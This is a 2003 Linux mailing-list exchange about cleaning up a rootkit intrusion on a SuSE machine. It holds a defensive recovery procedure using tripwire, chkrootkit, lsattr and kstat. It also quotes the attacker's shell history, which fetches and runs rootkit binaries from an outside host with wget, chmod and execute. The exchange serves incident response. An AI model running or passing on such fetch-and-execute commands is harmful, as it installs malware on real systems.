Thanks again for helpful information. New question: According to the history file of user whose account was used for intrusion, rootkit was downloaded from www.cappy.biz: cat /etc/issue wget www.cappy.biz/0/*/k chmod +x k ./k wget www.cappy.biz/0/*/noparty chmod +x noparty ./noparty etc. etc. Directory http://www.cappy.biz/0/*/ is very interesting. Can we somehow act against the owner of this site, so that the same thing doesn;t happen to other SuSE users? Best regards, Antun Balaz Institute of Physics, Belgrade Serbia and Montenegro On Mon, 24 Nov 2003, Dieter Kirchner wrote:
Hi,
Following procedure might work without reinstall:
- Take a second machine, install a fresh Linux with the same install media used for the infected - apply same updates as for infected machine - use tripwire to generate a new DB on the second machine for all executable dirs (/bin /usr/bin /sbin /usr/sbin ...) or better all dirs except /tmp and spool dirs - cp tripwire and db to infected machine - tripwire check - replace infected binarys - get chkrootkit - mount / from second machine with (ro,no_root_squash) - check infected machine with chkrootkit, bin mounted via nfs, do not use bins from infected (install nfsd temporary if not installed yet, or burn on CD and use this) - replace infected binarys again - reinstall kernel package on infected - check init scripts - reboot - second run all checks
U might use "lsattr / |less" first, look for files with flag "a u i" set (these are 99% infected). Use chattr to remove the undeletable flags (typical script kiddies use these flags to prevent root from removing infected files) and replace the bins.
Repeat the checks several times. After first run you should look into all dirs, including /dev /tmp and spool dirs. Download and use kstat to check the kernel. It helps to use a static kernel without module support, as the this reduces the number of working rootkits :-)
This worked for me on a remote controlled machine. It is recomended to sniff on the network to check for connections attempts during the procedure. And keep an eye on the fixed machine for some month.
Ciao, Dieter